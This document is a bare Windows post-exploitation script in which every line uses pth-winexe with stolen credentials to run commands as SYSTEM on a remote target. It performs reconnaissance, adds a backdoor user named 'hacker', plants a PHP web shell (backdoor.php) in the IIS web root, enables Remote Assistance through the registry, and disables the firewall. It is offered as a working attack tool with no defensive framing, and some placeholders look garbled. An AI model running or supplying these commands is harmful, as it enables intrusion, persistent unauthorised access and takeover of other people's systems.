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A Windows post exploitation shell script
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "powershell.exe -command Get-Hotfix"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net user hacker PASSWORD /add"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs /add hacker"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net group 'Domain Admins' /domain"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "echo ^< ?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\backdoor.php"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fAllowToGetHelp /t REG_DWORD /d 1 /f"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netsh firewall set opmode disable"
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